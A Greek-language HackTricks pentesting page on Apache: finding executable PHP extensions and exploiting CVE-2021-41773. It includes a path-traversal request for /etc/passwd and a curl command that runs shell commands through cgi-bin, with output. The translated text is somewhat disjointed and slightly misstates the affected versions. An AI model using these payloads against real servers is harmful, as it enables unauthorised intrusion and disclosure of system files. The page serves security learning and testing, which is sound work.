Apache

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εκτελέσιμες επεκτάσεις PHP

Ελέγξτε ποιες επεκτάσεις εκτελεί ο διακομιστής Apache. Για να τις αναζητήσετε, μπορείτε να εκτελέσετε:

grep -R -B1 "httpd-php" /etc/apache2

Επίσης, μερικά μέρη όπου μπορείτε να βρείτε αυτή τη διαμόρφωση είναι:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

Η ευπάθεια CVE-2021-41773 επηρεάζει τον διακομιστή Apache HTTP Server έκδοσης 2.4.49 και προηγούμενες εκδόσεις. Αυτή η ευπάθεια επιτρέπει σε επιτιθέμενους να εκτελέσουν κακόβουλο κώδικα μέσω ενός απομακρυσμένου αιτήματος HTTP GET. Ο επιτιθέμενος μπορεί να εκτελέσει αυθαίρετες εντολές στον διακομιστή, προκαλώντας πιθανή διαρροή πληροφοριών ή ακόμη και πλήρη αποκάλυψη του συστήματος αρχείων.

Εκμετάλλευση

Για να εκμεταλλευτούν αυτήν την ευπάθεια, οι επιτιθέμενοι μπορούν να στείλουν ένα αιτημα HTTP GET με τον εξής δρομολογητή:

/.%2e/%2e%2e/%2e%2e/etc/passwd

Αυτό το αίτημα θα προκαλέσει την αποκάλυψη του αρχείου /etc/passwd, που περιέχει πληροφορίες για τους χρήστες του συστήματος.

Αντιμετώπιση

Για να αντιμετωπιστεί αυτή η ευπάθεια, συνιστάται να ενημερωθεί ο διακομιστής Apache HTTP Server στην τελευταία έκδοση, που διορθώνει αυτήν την ευπάθεια. Επίσης, μπορεί να είναι χρήσιμο να ελεγχθούν οι ρυθμίσεις ασφαλείας του διακομιστή για να αποτραπεί η εκμετάλλευση αυτής της ευπάθειας.

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated